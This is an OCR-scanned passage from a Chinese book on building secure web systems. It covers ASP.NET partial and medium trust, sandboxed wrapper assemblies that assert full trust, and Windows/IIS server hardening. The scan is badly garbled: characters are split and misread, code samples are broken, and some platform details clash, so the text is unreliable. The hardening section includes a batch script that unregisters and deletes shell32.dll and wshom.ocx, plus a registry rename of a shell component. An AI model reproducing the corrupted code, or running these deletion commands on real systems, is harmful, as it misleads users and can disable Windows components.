对 应 的 相关 Level 属性 ，System.Web 和 System.Web.Mobile 中 所 有 公共 类 型 都 是 用 此 权限 
的 Minimum 级 要 求 进行 保护 的 。 这 样 就 确保 了 如 果 没 有 管理 员 的 特定 策略 配置 ，Web 应 
用 程序 代码 就 无 法 用 于 其 他 的 部 分 信任 环境 。 


4. 替换 参数 


如 果 对 某 个 ASP.NET 策略 文件 进行 编辑 ， 就 会 注意 到 有 些 权 限 元 素 包 含 奉 换 参 数 
($AppDirUrl$、$CodeGen$ 和 $Gac$) 。 这 些 参数 可 将 权限 配置 到 属于 Web 应 用 程序 从 不 同位 
置 加 载 的 程序 集 。 每 个 替换 参数 都 会 在 安全 策略 计算 时 用 实际 值 进行 替换 ， 这 一 过 程 会 在 第 一 
次 Web 应 用 程序 的 程序 集 加 载 时 进行 ，Web 应 用 程序 可 能 包括 以 下 三 种 程序 集 类 型 : 

(1) 生成 时 编译 并 部 署 在 应 用 程序 bin 目录 中 的 私有 程序 集 。 

这 种 类 型 的 程序 集 不 具有 强 名 称 , ASPNET Web 应 用 程序 所 使 用 的 具有 强 名 称 的 程序 
集 必须 安装 在 全 局 程序 集 缓存 中 。 

(2) 响应 页 请 求生 成 的 动态 编译 程序 集 。 

(3) 从 计算 机 的 全 局 程序 集 缓存 加 载 的 共享 程序 集 。 

每 个 程序 集 类 型 都 有 一 个 相关 的 替换 参数 ， 如 表 13-2 所 示 。 


表 13-2 ”代码 访问 安全 策略 的 替换 参数 
参数 代 表 





$AppDirUrl$ | 应 用 程序 的 虚拟 根 目 录 。 人 允许 权限 应 用 于 位 于 应 用 程序 bin 目录 中 的 代码 





包含 动态 生成 的 程序 集 的 目录 (例如 ，.aspx 页 的 编译 结果 ) 。 可 以 逐个 应 用 程序 进 
$CodeGen$ 行 配置 ， 默 认 时 是 %windir%\Microsoft NET\Framework\{version}\Temporary ASP.NET 
Files。$CodeGen$ 允许 权限 应 用 于 动态 生成 的 程序 集 





安装 在 计算 机 的 全 局 程序 集 缓存 (Global Assembly Cache, GAC) (%windir%\ 
S$Gac$ assembly) 中 的 任何 程序 集 。 这 允许 权限 被 授予 Web 应 用 程序 从 Global Assembly Cache 
加 载 的 具有 强 名 称 的 程序 集 





“3s 


无 懈 可 击 





13.7 开发 部 分 信任 Web 应 用 程序 





所 谓 部 分 信任 Web 应 用 程序 就 是 没有 完全 信任 但 具有 代码 访问 安全 策略 确定 的 代码 
访问 权限 受 限 集 的 应 用 程序 ， 也 就 是 限制 了 部 分 信任 的 应 用 程序 访问 资源 和 执行 其 他 特权 
操作 的 能 力 。 部 分 信任 应 用 程序 有 些 权限 是 被 拒绝 的 ， 因 此 无 法 直接 访问 那些 要 求 此 类 权 
限 的 资源 。 其 他 权限 是 以 受 限 方式 授予 的 ， 是 要 以 一 种 受 限 的 方式 进行 访问 。 例 如 ， 受 限 
的 FileIOPermission 可 能 指定 应 用 程序 可 访问 文件 系统 ， 但 只 是 应 用 程序 虚拟 根 目 录 下 的 
目录 。 

通过 将 Web 应 用 程序 或 者 Web 服务 配置 为 部 分 信任 ， 可 以 限制 应 用 程序 访问 关键 系 
统 资 源 或 属于 其 他 Web 应 用 程序 的 资源 的 能 力 。 仅 授予 应 用 程序 需要 的 权限 ， 就 可 以 构建 
最 低 特权 的 Web 应 用 程序 ，Web 应 用 程序 受到 代码 注入 攻击 的 威胁 时 限制 潜在 的 损害 降 
到 最 低 。 

如 果 对 一 个 现 有 的 Web 应 用 程序 重新 配置 运行 在 部 分 信任 级 ， 则 有 可 能 遇 到 以 下 问 
题 ， 除 非 应 用 程序 在 访问 的 资源 上 受到 严格 限制 ; 

〈1) 应 用 程序 无 法 调用 具有 强 名 称 而 且 没有 使 用 APTCA (AllowPartiallyTrustedCallers- 
Attribute) 批注 的 程序 集 。 没 有 APTCA， 有 具有 强 名 称 的 程序 集 将 发 出 一 个 完全 信任 要 求 ， 
该 要 求 到 达 部 分 信任 Web 应 用 程序 时 会 失败 。 许 多 系统 程序 集 只 支持 完全 信任 调用 方 。 以 
下 列表 说 明了 哪些 .NET 框架 程序 集 支 持 部 分 信任 调用 方 , 可 以 被 无 沙 箱 保护 的 程序 集 的 部 
分 信任 Web 应 用 程序 直接 进行 调用 。 

以 下 系统 程序 集 都 应 用 了 APTCA， 也 就 意味 着 它们 可 以 被 部 分 信任 Web 应 用 程序 或 
任何 部 分 信任 代码 所 调用 : 

* System.Windows.Forms.dll; 

* System.Drawing.dl17 

*。 System.dll; 

“Mscorlib.dlls 

* IEExecRemote.dl17 

*。Rccessibility.dl1; 

* Microsoft.VisualBasic.dll; 

*。 System.XML .dl117 

*。 System.Web.dl1; 


*。 System.Web.Services.dl17 
*。 System.Data.dl1。 


如 果 部 分 信任 应 用 程序 因为 调用 了 没有 用 APTCA 标记 的 强 名 称 的 程序 集 而 失败 ， 就 
会 生成 一 个 SecurityException 异常 ， 在 此 情况 下 异常 中 不 会 包含 更 多 调用 失败 的 信息 。 

(2) 权限 要 求 可 能 一 开始 就 失败 ， 配 置 的 信任 级 可 能 无 法 授予 应 用 程序 访问 特定 资源 
类 型 必要 的 权限 。 以 下 是 一 些 常见 的 场景 : 

@ 应 用 程序 使 用 事件 日 志 或 注册 表 。 部 分 信任 Web 应 用 程序 不 具备 访问 这 些 系统 资 
源 必需 的 权限 ， 如 果 代 码 访 问 这 些 系 统 资源 ， 将 生成 一 个 SecurityException 异常 。 

@ 应 用 程序 使 用 ADO.NET OLE DB 数据 提供 程序 访问 数据 源 。OLE DB 数据 提供 程 
序 需要 完全 信任 调用 方 。 
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@ 应 用 程序 调用 Web 服务 。 部 分 信任 Web 应 用 程序 具有 一 个 受 限 的 WebPermission， 
这 将 影响 应 用 程序 调用 位 于 远程 站 点 上 的 Web 服务 的 能 


13.8 ”部 分 信任 级 的 配置 方法 


如 果 开 发 人 员 计 划 将 一 个 现 有 的 应 用 程序 迁移 到 部 分 信任 级 ， 一 种 办 法 是 逐渐 降低 权 
限 ， 这 样 就 可 以 看 到 应 用 程序 的 哪些 部 分 会 出 问题 ， 所 需 的 信任 级 应 该 取决 于 想 要 为 应 用 
程序 设置 的 限制 程度 。 步 又 如 下 : 

(1) 配置 为 高 、 中 、 低 或 最 低 信任 的 应 用 程序 将 无 法 调用 非 托 管 代码 或 服务 组 件 、 写 
事件 日 志 、 访 问 消息 队列 或 访问 OLE DB 数据 源 。 

(2) 配置 为 高 度 信任 的 应 用 程序 将 有 无 限 的 对 文件 系统 的 访问 权限 。 

(3) 配置 为 中 度 信任 的 应 用 程序 有 受 限 的 文件 系统 访问 权限 ， 它 们 只 能 访问 自己 的 应 
用 程序 目录 层次 中 的 文件 。 

(4) 配置 为 低 度 或 者 最 低 信任 的 应 用 程序 无 法 访问 SQL Server 数据 库 。 

(5) 最 低 信任 的 应 用 程序 无 法 访问 任何 资源 。 











13.9 ”部 分 信任 的 Web 应 用 程序 处 理 策略 


如 果 开 发 一 个 部 分 信任 的 Web 应 用 程序 或 在 部 分 信任 级 启用 一 个 现 有 的 应 用 程序 , 将 
会 遇 到 很 多 问题 ， 因 为 应 用 程序 将 尝试 访问 没有 相应 权限 的 资源 ， 这 时 可 以 使 用 两 种 基本 
的 办 法 : 


1. 自 定义 策略 


自 定义 策略 是 两 种 方法 中 相对 容易 实现 的 方法 ， 而 且 不 需要 开发 人 员 做 任何 工作 。 但 
有 时 Web 服务 器 上 的 安全 策略 不 允许 ， 而 且 在 某 些 情况 下 ， 调 用 .NET 框架 类 库 的 代码 可 
能 需要 完全 信任 。 这 些 情况 下 就 必须 使 用 沙 箱 保护 了 。 例 如 ， 以 下 资源 要 求 完全 信任 ， 所 
以 在 资源 访问 代码 访问 这 些 资源 的 时 候 必须 用 沙 箱 进行 保护 : 

事件 日 志 (通过 EventLog 类 ) 。 

口 OLE DB 数据 源 (通过 ADO.NET OLE DB 数据 提供 程序 ) ; 

口 ODBC 数据 源 (通过 ADO.NET ODBC NET 数据 提供 程序 》; 

口 Oracle 数据 库 (通过 ADO.NET Oracle .NET 数据 提供 程序 ) 。 

这 个 列表 并 不 完整 ， 但 已 经 包含 了 当前 需要 完全 信任 的 常用 资源 类 型 。 


2. 沙 箱 保护 策略 








将 资源 访问 代码 放 入 一 个 包装 程序 集 ， 授 予 包装 程序 集 (而 不 是 Web 应 用 程序 ) 完全 
诗 任 权限 ， 并 用 沙 箱 保护 特权 代码 的 权限 需求 。 
使 用 哪 种 方法 取决 于 具体 问题 , 如 果 尝 试 调用 一 个 不 包含 AllowPartiallyTrustedCallers- 
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Attribute 的 系统 程序 集 ， 那 么 问题 就 变 成 了 如 何 给 一 段 代 码 授 予 完全 信任 权限 。 在 此 情况 
下 就 应 该 使 用 沙 箱 保护 方式 ， 授 予 用 沙 箱 保护 的 包装 程序 集 以 完全 信任 权限 。 如 果 将 特权 
应 用 程序 代码 放 入 单独 的 程序 集 ， 用 沙 箱 保护 起 来 ， 可 以 授予 程序 集 更 多 的 权限 。 或 可 以 
授予 它 完全 信任 ， 而 无 需 整个 应 用 程序 以 扩展 的 权限 运行 。 

例如 ， 使 用 ADONET OLE DB 数据 提供 程序 并 与 System.Data.OleDb.OleDbCommand 
类 交互 的 代码 就 需要 完全 信任 。 虽 然 System.Data.dll 程序 集 已 经 用 AllowPartiallyTrusted- 
CallersAttribute、System.Data.OleDb.OleDbCommand 类 等 进行 标记 ， 但 是 仍然 无 法 由 部 分 
信任 调用 方 进行 调用 ， 因 为 它 是 用 一 个 完全 信任 的 链接 要 求 保护 起 来 的 。 下 面 运 行 以 下 命 
令 ， 从 %windir%MicrosoftNETFramework{fversion} 目录 打开 permview 实用 工具 : 

















permview /DECL /OUTPUT System.Data.Perms .txt System.Data.dll 


System.Data.Perms.txt 中 的 输出 包含 以 下 输出 结果 : 

class System.Data.OleDb.OleDbCommand LinktimeDemand permission set: 

<PermissionSet class="System.Security.PermissionSet" 

Version="1" Unrestricted="true"/> 

这 说 明 保 护 System.Data.OleDb.OleDbCommand 类 的 链接 要 求 中 使 用 了 一 个 无 限 权 限 
集 〈 完 全 信任 ) 。 在 此 类 情况 下 ， 配 置 策略 授予 部 分 信任 代码 以 特定 的 无 限 权 限 〈 如 
OleDbPermission) 是 不 够 的 ; 相反 ， 则 必须 用 沙 箱 保护 资源 访问 代码 ， 并 授予 它 完全 信任 ， 
而 最 简单 的 实现 方式 就 是 将 其 安装 在 GAC 中 。 

然后 , 使 用 Permview.exe 找 出 其 他 类 的 权限 需求 。 虽然 这 里 只 显示 了 声明 性 安全 属性 ， 
如 果 一 个 类 必须 要 求 完全 信任 ， 那 么 就 无 法 通过 Permview.exe 进行 查看 。 这 时 ， 通 过 从 部 
分 信任 代码 中 调用 它 并 诊断 是 否 有 任何 安全 异常 ， 来 测试 类 的 安全 需求 。 

仅仅 因为 程序 集 用 APTCA 进行 了 标记 ， 并 不 意味 着 所 有 包含 的 类 都 支持 部 分 信任 调 
用 方 ， 有 些 类 可 能 包含 显 式 的 完全 信任 要 求 。 


13.10” 自 定义 策略 


如 果 Web 应 用 程序 代码 所 需要 的 权限 比特 定 ASPNET 信任 级 所 授予 的 还 要 多 ， 那 么 
最 简单 的 选择 就 是 自 定义 一 个 策略 文件 ， 授予 Web 应 用 程序 更 多 的 代码 访问 权限 。 可 以 修 
改 现 有 的 策略 文件 并 授予 更 多 的 权限 ， 也 可 以 根据 现 有 策略 文件 创建 一 个 新 的 策略 文件 。 

如 果 修 改 了 内 置 的 策略 文件 (如 中 度 信 任 的 Web_mediumtrust.config 策略 文件 ) ， 将 
会 影响 配置 为 某 个 信任 运行 的 所 有 应 用 程序 。 

为 特定 的 应 用 程序 自 定义 策略 的 步骤 如 下 : 

(1) 复制 现 有 的 策略 文件 ， 由 此 创建 一 个 新 的 策略 文件 。 例 如 ， 复 制 一 个 中 度 信 任 策 
略 文件 ， 并 创建 一 个 新 的 策略 文件 ， 代 码 如 下 所 示 : 


swindirsMicrosoft-NETFTramework{fversion}jCONFIGweb yourtrust.config 


(2) 在 策略 文件 中 添加 ASPNET 权限 集 所 需 权 限 ， 或 修改 现 有 权限 以 授予 限制 性 较 
低 的 权限 。 

(3 ) 在 Machine.config 中 的 <securityPolicy> 下 为 新 的 信任 级 文件 添加 一 个 新 的 
<trustLevel> 有 上 映射， 代码 如 下 所 示 : 
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<securityPolicy> 
<trustLevel name="Custom" policyFile="web yourtrust.config"/> 


</securityPolicy> 


(4) 配置 应 用 程序 在 新 的 信任 级 运行 , 配置 应 用 程序 web.config 文件 中 的 <trust> 元 素 ， 
代码 如 下 所 示 : 


<system.web> 
<trust level="Custom" originUrl=""/> 
</system.web> 


13.11 沙 箱 保护 策略 


沙 箱 保 护 模 式 不 需要 更 新 ASPNET 代码 访问 安全 策略 ， 而 是 将 资源 访问 代码 包装 到 
其 自己 的 包装 程序 集中 ， 配 置 机 器 级 代码 访问 安全 策略 ， 授 予 特定 的 程序 集 适 当 的 权限 。 
然后 ， 通 过 CodeAccessPermission.Assert 方法 用 沙 箱 保护 更 高 特权 的 代码 ， 这 样 就 无 需 改 
变 Web 应 用 程序 被 授予 的 整体 权限 了 。Assert 方法 防止 了 资源 访问 代码 发 出 的 安全 要 求 传 
播 到 调用 堆栈 并 超出 包装 程序 集 的 边界 。 

沙 箱 保 护 横 式 使 用 以 下 步骤 应 用 于 访问 受 限 的 资源 ， 或 执行 另 一 个 特权 操作 《该 特权 
操作 的 父 程序 对 其 没有 足够 权限 ) 的 任何 代码 : 

(1) 在 包装 程序 集中 封装 资源 访问 代码 。 

也 就 是 说 ， 要 确保 程序 集 具 有 强 名 称 ， 使 其 可 安装 在 GAC 中 。 

(2) 在 访问 资源 之 前 断言 相关 权限 。 

这 意味 着 调用 方 必须 有 断言 安全 权限 〈 带 有 SecurityPermissionFlag.Assertion 的 
SecurityPermission) ， 配 置 为 Medium 或 更 高 信任 级 的 应 用 程序 有 此 权限 。 

断言 权限 是 有 一 定 危险 性 的 ， 意 味 着 调用 程序 无 需 相 应 的 资源 访问 权限 ， 就 可 访问 程 
序 集 封 装 的 资源 ，Assert 语句 表示 程序 能 够 保证 其 调用 方 的 合法 性 。 为 此 程序 应 该 要 求 另 
外 一 个 权限 ， 从 而 可 以 在 调用 Assert 之 前 为 程序 进行 授权 。 照 此 方式 ，Web 应 用 中 只 允许 
被 授予 此 权限 的 代码 访问 程序 集 公 开 的 资源 。 

.NET 框架 本 身 可 能 无 法 按 要 求 提 供 适 合 的 权限 , 在 这 种 情况 下 可 以 创建 和 一 个 自 定义 
权限 。 有 关 如 何 创建 自 定义 权限 的 更 多 信息 ， 请 参阅 第 2 章 2.4 节 。 
(3) 用 APTCA 批注 包装 程序 集 。 
这 使 部 分 信任 的 Web 应 用 程序 可 调用 程序 集 。 
(4) 将 包装 程序 集 安装 在 GAC 中 。 
这 种 方法 将 授予 包装 而 非 Web 应 用 程序 完全 信任 。ASP.NET 策略 文件 包含 以 下 代码 
下 面 这 组 代码 将 授予 GAC 中 任何 程序 集 完 全 信任 权限 。 


<CodeGroup 
class="UnionCodeGroup" 
version="1" 
PermissionSetName="FullTrust"> 
<IMembershipCondition 





组 
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无 懈 可 击 





class="UrlMembershipCondition™ 
Url="$Gac$/*" 
version="1" 
/> 
</CodeGroup> 
默认 企业 级 和 本 地 机 器 策略 还 要 将 完全 信任 授予 位 于 My Computer 区 域 中 的 任何 代 
码 ， 这 包含 安装 在 GAC 中 的 代码 。 这 点 很 重要 ， 因 为 所 授予 的 权限 要 跨越 多 个 策略 级 进 
行 交集 操作 。 
(5) 配置 Web 应 用 程序 信任 级 〈 如 将 其 设置 为 Medium) 。 
图 13-2 所 示 为 在 特权 代码 自己 的 程序 集中 用 沙 箱 保护 代码 ， 此 程序 集 断 言 了 相关 权限 。 
使 用 单独 的 程序 集 封 装 资源 访问 , 避免 了 将 资源 访问 代码 放 入 .aspx 文件 或 者 代码 隐藏 
文件 中 ， 将 应 用 程序 迁移 到 部 分 信任 环境 将 更 加 简单 。 











Demand then 
<trust level="Medium"> Assert 
originUrl=""/> 












Wrapper 
部 分 信任 的 i Assembly Resource 
Web 程序 (Strong Named Access 安全 资源 
inthe GAC) 








沙 箱 保 护 


图 13-2 沙 箱 保护 








13.12 ”中 度 信任 程序 


如 果 是 寄宿 类 型 的 Web 应 用 程序 ， 可 以 选择 实现 中 度 信任 安全 策略 以 限制 特权 操作 。 
本 节 集 中 讨论 运行 中 度 信任 应 用 程序 ， 并 说 明 如 何 克 服 可 能 遇 到 的 问题 。 

以 中 度 信任 运行 有 两 个 主要 优点 : 减少 受 攻击 面 和 应 用 程序 的 独立 。 

1. 减少 受 攻击 面 

中 度 信任 不 会 授予 应 用 程序 对 所 有 程序 的 无 限 访问 权限 ， 而 是 授予 应 用 程序 一 个 完整 
权限 集 的 子 集 ， 因 此 受 攻击 面 将 减少 。 许 多 中 度 信 任 策略 授予 的 权限 处 于 受 限 状态 ， 即 使 
攻击 者 因为 某 种 原因 能 够 控制 应 用 程序 ， 它 的 行为 也 是 受 限制 的 。 

2. 应 用 程序 独立 


带 有 代码 访问 安全 的 应 用 程序 独立 限制 了 对 系统 资源 和 其 他 应 用 程序 所 拥有 的 资源 
的 访问 。 即 使 进程 标识 有 可 能 被 允许 读 写 Web 应 用 程序 目录 之 外 的 文件 , 中 度 信任 应 用 程 
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序 中 的 FileIOPermission 也 是 受 限 的 ， 只 允许 应 用 程序 读 取 或 写 应 用 程序 目录 层次 。 
13.13 ”中 度 信任 的 限制 


如 果 应 用 程序 以 中 度 信 任 运 行 ， 会 面临 许多 限制 ， 其 中 最 重要 的 如 下 : 

口 无 法 直接 地 访问 事件 日 志 。 

口 文件 系统 访问 受 限 ， 只 能 访问 应 用 程序 虚拟 目录 层次 中 的 文件 。 

口 无 法 直接 地 访问 OLE DB 数据 源 (虽然 中 度 信任 应 用 程序 被 授予 了 
SqlClientPermission 权限 ， 允 许 其 访问 SQL Server) 。 

口 对 Web 服务 的 受 限 访 问 。 

口 无 法 直接 访问 Windows 注册 表 。 

下 面 说 明 如 何 从 中 度 信 任 的 Web 应 用 程序 或 Web 服务 访问 以 下 资源 类 型 : 

1; QEE:DB 





中 度 信 任 的 Web 应 用 程序 并 没有 授予 OleDbPermission 权限 ， 而 且 OLE DB 数据 提供 
程序 要 求 完全 信任 调用 方 。 如 果 应 用 程序 需要 访问 OLE DB 数据 源 ， 同 时 又 运行 在 中 度 信 
任 级 , 应 该 使 用 沙 箱 保 护 方式 。 应 该 将 数据 访问 代码 放 入 单独 的 程序 集 , 为 其 加 上 强 名 称 ， 
安装 在 GAC 中 ， 从 而 授予 完全 信任 。 

修改 策略 是 不 起 作用 的 ， 除 非 将 信任 级 设置 为 Full， 因 为 OLE DB 托管 提供 程序 要 求 
完全 信任 。 图 13-3 所 示 为 OLE DB 资源 访问 方法 : 


修改 为 Fa 路、 Demand then 


<trust level="Medium"> Assert 
originUrl=""/> 


| We = 
部 分 信任 的 Assembly Resource 


Web 程序 (Strong Named Access 安全 资源 


inthe GAC) 


图 13-3 ”OLE DB 资源 访问 
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2. 沙 箱 保护 


为 了 生成 用 沙 箱 保护 的 包装 程序 集 调 用 OLE DB 数据 源 ， 为 数据 访问 代码 创建 了 一 个 
程序 集 。 具体 做 法 是 ， 配置 程序 集 版 本 ,给 程序 集 加 上 强 名称 ， 并 用 AllowPartiallyTrusted- 
CallersAttribute 进行 标记 ， 代 码 如 下 所 示 : 




















二 和 





无 懈 可 击 一 一 全 方位 构建 安全 Web 系统 
[assembly: AssemblyVersion("1.0.0.0")] 

[assembly: AssemblyKeyFile(@"....oledbwrapper.snk")] 
[assembly:AllowPartiallyTrustedCallersAttribute()] 


如 果 想 支持 部 分 信任 调用 方 ， 必 须 用 AllowPartiallyTrustedCallersAttribute 批注 任何 具 
有 强 名 称 的 程序 集 。 无 论 何 时 加 载 和 编译 具有 强 名 称 程序 集 的 代码 , 都 将 取消 .NET 框架 做 
出 的 隐 式 完全 信任 链接 要 求 。 
请 求 完 全 信任 虽然 并 非 绝 对 必要 ， 但 仍然 是 一 个 很 好 的 做 法 ， 因 为 这 会 使 管理 员 通 过 
使 用 Permview.exe 一 类 的 工具 查看 程序 集 的 权限 需求 。 请 求 完全 信任 的 无 限 权 限 集 代码 
如 下 : 


[assembly: PermissionSet (SecurityAction.RequestMinimum, Unrestricted=true) 


用 Assert 语句 包装 数据 库 调用 ， 以 断言 完全 信任 ， 包 装 匹配 的 RevertAssert 调用 以 消 
除 断 言 的 影响 。 将 RevertAssert 调用 放 入 finally 块 是 一 种 很 好 的 做 法 。 

OLE DB 提供 程序 要 求 完 全 信任 ,包装 必须 断言 完全 人 信任。 断言 一 个 OleDbPermission 
是 不 够 的 。 断 言 的 代码 如 下 : 


public OleDbDataReader GetProductList() 
try 
i 
// Rssert full trust (the unrestricted permission set) 
new PermissionSet (PermissionState.Unrestricted) .Assert() 7 
OleDbConnection conn = new OleDbConnection( 
"Provider=SQLOLEDB; Data Source=(local);" + 
"Integrated Security=SSPI; Initial Catalog=Northwind"); 
OleDbCommand cmd = new OleDbCommand ("spRetrieveProducts", conn); 
cmd.CommandType = CommandType.StoredProcedure; 
conn.Open (); 
OleDbDataReader reader = 
cmd.ExecuteReader (CommandBehavior.CloseConnection); 
return reader; 
































catch (OleDbException dbex) 

; // Log and handle exception 
ee ex) 

; // Log and handle exception 

a 

, CodeAccessPermission.RevertAssert (); 
上 


return null; 














以 下 命令 生成 程序 集 并 将 其 安装 在 GAC 中 : 

gacutil-i oledbwrapper.dll 

为 了 确保 程序 集 在 每 次 后 续 的 重新 生成 后 都 要 添加 到 GAC 中 ， 可 以 在 包装 程序 集 项 
目 中 添加 事件 命令 行 〈 可 以 在 Visual StudioNET 中 项 目的 属性 中 找到 ) : 

C:\Program Files\Microsoft Visual StudioNET\Bingacutil.exe" /i $ (TargetPath) 


二 
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任何 ASP.NET Web 应 用 程序 或 Web 服务 调用 具有 强 名 称 的 程序 集 都 必须 安装 在 GAC 
中 。 在 此 例 中 ， 应 该 将 程序 集 安装 在 GAC 中 ， 以 确保 它 被 授予 完全 信任 。 

配置 Web 应 用 程序 为 中 度 信任 。 添 加 以 下 代码 到 web.config 中 ， 或 将 其 放 入 
Machine.config， 指 向 应 用 程序 的 <location> 元 素 中 : 


<trust level="Medium" originUrl=""/> 


应 该 从 ASP.NET Web 应 用 程序 中 引用 数据 访问 程序 集 。 因 为 ， 具 有 强 名 称 的 程序 集 
必须 位 于 GAC 而 不 是 Web 应 用 程序 的 bin 目录 中 ， 如 果 不 使 用 代码 隐藏 文件 ， 则 将 程序 
集 添加 到 应 用 程序 使 用 的 程序 集 列表 中 .可 以 使 用 以 下 命令 获取 程序 集 的 PublicKeyToken: 


sn-Tp oledbwrapper.d1ll 
// 使 用 大 写 的 -了 开关 , 然后 添加 以 下 行 到 Machine .config 或 web.config 中 
<compilation debug="false" > 

<assemblies> 

<add assembly="oledbwrapper, Version=1.0.0.0, Culture=neutral, 
PublicKeyToken=4bi, A.06"/> 

</assemblies> 

</compilation> 

















二 
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不 管 代码 安全 技术 多 么 完善 ， 忽 略 服务 器 安全 将 使 得 安全 防范 体系 功 亏 一 筑 。 服 务 器 
安全 也 是 安全 系统 研发 中 不 可 或 缺 的 一 个 设计 环节 。 本 章 介绍 配置 服务 器 操作 系统 ， 安 全 
地 配置 IS 7.0 和 IIS 8.0， 侧 重 于 基于 Web 技术 的 防止 漏洞 攻击 技术 。 


14.1 配置 安全 的 操作 系统 


目前 用 于 Web 系统 的 服务 器 有 很 多 种 , 但 最 主流 的 就 是 Windows 和 Linux。 基 本 的 服 
务 器 安全 设置 如 下 : 

1. 安装 补丁 

安装 好 操作 系统 之 后 ， 最 好 能 在 托管 之 前 完成 补丁 的 安装 ， 如 果 是 Windows XP 则 确 


Windows Update 命令 ， 安 装 所 有 的 关键 更 新 。 

2. 安装 杀毒 软件 
虽然 杀毒 软件 有 时 候 不 能 解决 问题 ， 但 是 杀毒 软件 还 是 能 避免 很 多 问题 。 需 要 注意 的 
是 ， 不 要 指望 杀毒 软件 消灭 所 有 的 木马 ， 因 为 ASP.NET 木马 可 以 通过 一 定 手段 避 开 杀毒 
软件 的 查 杀 。 

3. 设置 端口 保护 、 设 置 防火 墙 ， 删 除 默认 共享 

这 些 都 是 服务 器 防 黑客 的 措施 ， 即 使 服务 器 上 没有 IS， 这 些 安全 措施 最 好 都 做 。 

4. 权限 设置 


权限 设置 是 防止 ASP.NET 漏洞 攻击 的 关键 所 在 ， 优 秀 的 权限 设置 可 以 将 危害 减少 在 
一 个 IS 站 点 甚至 一 个 虚拟 目录 里 ， 下 面 讲 一 下 权限 设置 的 原理 和 思路 : 

(1) 原理 

Windows 系统 中 大 多 数 把 权限 按 用 户 ( 组 ) 来 划分 ， 选 择 “ 开 始 ” 一 “程序 ”一 “ 管 
理工 具 ” 一 “计算 机 管理 ”一 “本 地 用 户 和 组 管理 系统 用 户 和 用 户 组 ”命令 。 

在 进行 NTFS 权限 设置 方面 ， 要 在 分 区 的 时 候 把 所 有 的 硬盘 都 分 为 NTFS 分 区 ， 然 后 
确定 每 个 分 区 对 每 个 用 户 开 放 的 权限 。 右 击 文件 〈 夹 ) 在 弹出 的 快捷 菜单 中 选择 “属性 ”一 
“安全 ”命令 ， 管 理 NTFS 文件 ( 夹 ) 权限 。 

每 个 IS 站 点 或 虚拟 目录 , 都 可 以 设置 一 个 匿名 访问 用 户 (暂且 称 为 “IIS 匿名 用 户 ”) ， 
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IS 


用 户 访 问 网 站 ASPNET 文件 的 时 候 ， 这 个 .aspx 文件 所 具有 的 权限 ， 就 是 这 个 “IIS 匿名 
用 户 ” 所 具有 的 权限 。 

(2) 思路 

要 为 每 个 独立 的 需 保 护 个 体 ( 如 一 个 网 站 或 一 个 虚拟 目录 ) 创建 一 个 系统 用 户 ， 让 这 
个 站 点 在 系统 中 具有 唯一 的 可 以 设置 权限 的 身份 。 

在 HS 中 选择 站 点 “属性 ”一 “目录 安全 性 ”一 “匿名 访问 和 验证 控制 ”一 “编辑 ”一 “ 匿 
名 访问 ”一 填写 用 户 信息 。 

设置 所 有 的 分 区 禁止 这 个 用 户 访问 ， 而 刚才 站 点 的 主 目录 对 应 的 文件 夹 设置 应 该 允许 
用 户 访问 〈 要 去 掉 继 承 父 权 限 ， 并 且 要 加 上 超 管 组 和 SYSTEM 组 ) 。 这 样 设置 以 后 ， 站 点 
里 的 ASP.NET 程序 就 具有 当前 文件 夹 的 权限 ， 从 探 针 上 看 ， 所 有 的 硬盘 都 是 红 又 标 志 。 


5. 改名 或 卸载 不 安全 组 件 


只 要 做 好 权限 设置 ，FSO、XML、strem 就 都 成 为 了 安全 组 件 ， 因 为 它们 没有 跨 出 自 
己 的 文件 夹 或 站 点 的 权限 。 最 危险 的 组 件 是 WSH 和 Shell， 它 们 可 以 运行 硬盘 里 的 exe 

组 件 是 为 了 应 用 而 出 现 的 ， 所 有 的 组 件 都 有 用 处 ， 所 以 在 外 载 一 个 组 件 之 前 ， 必 须 确 
认 这 个 组 件 网 站 程序 不 需要 ， 或 即使 去 掉 也 不 关 大 体 的 。 

例如 ，FSO 和 XML 是 常用 的 组 件 。WSH 组 件 会 被 一 部 分 主机 管理 程序 用 到 ， 也 有 的 
打包 程序 也 会 用 到 ， 这 个 时 候 就 不 能 随便 和 卸载 。 


6. 御 载 不 安全 组 件 的 方法 


最 简单 的 务 载 方法 是 直接 卸载 后 删除 相应 的 程序 文件 。 将 下 面 的 代码 保存 为 一 个 .bat 
文件 (以 下 均 以 Vista 为 例 ， 如 果 使 用 2010， 则 系统 文件 夹 应 该 为 C:\WINDOWS\) 。 

regsvr32/u C:\WINNT\System32\wshom.ocx 

del C:\WINNT\System32\wshom.ocx 


regsvr32/u C:\WINNT\system32\shell32.d1ll 
del C:\WINNT\system32\shell32.d1l 








运行 该 文件 ，WScript.Shell、Shell.application 和 WScript.Network 就 会 被 外 载 了 。 可 能 
会 提示 无 法 删除 文件 ， 重 启 一 下 服务 器 ， 会 发 现 这 3 个 都 提示 “X 安 全 ”了 。 


7. 为 不 安全 组 件 改名 


这 里 所 说 的 改名 是 指 组 件 名 称 和 Clsid 都 要 改 ， 下 面 以 Shell.application 为 例 介绍 改名 
方法 : 

打开 注册 表 编 辑 器 : 选择 “开始 ”一 “运行 ”一 “regedit ”命令 , 按 Enter 键 后 选择 “ 编 
辑 ” 一 “查找 ”命令 ， 然 后 输入 组 件 名 ， 单 击 “ 下 一 个 ”按钮 ， 用 这 个 方法 找到 两 个 注册 
表 项 : “{13709620-C279-11CE-A49E-444553540000}” 和 “Shell.application”。 把 这 两 个 
注册 表 项 导出 来 ， 保 存 为 .reg 文件 。 

更 改 实例 如 下 : 

13709620-C279-11CE-A49E-444553540000 改名 为 


13709620-C279-11CE-A49E-444553540001 
Shell.application 改名 为 Shell.application ajiang 


人 


文件 导入 到 注 


无懈可击 
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因此 ,就 把 刚才 导出 的 reg 文件 里 的 内 容 按 上 面 的 对 应 关系 替换 ,然后 把 修改 好 的 .reg 
| 表 中 (双击 即 可 〉， 导 入 改名 后 的 注册 表 项 之 后 ， 不 要 忘记 删除 原 有 的 两 












个 项 目 。 这 里 需要 注意 一 点 ，Clsid 只 能 由 0 一 9 数字 和 A~F 字母 组 成 。 


始 


下 面 是 修改 后 的 代码 : 


Windows Registry Editor Version 5.00 
[HKEY CLASSES ROOT\CLSID\{13709620-C279-11CE-A49E-444553540001}] 
@="Shell Automation Service" 


[HKEY CLASSES ROOT\CLSID\{13709620-C279-11CE-A49E-444553540001}\InProcs 
erver32] 

@="C:\\WINNT\\system32\\shell32.d1l1" 

"ThreadingModel"="Apartment" 


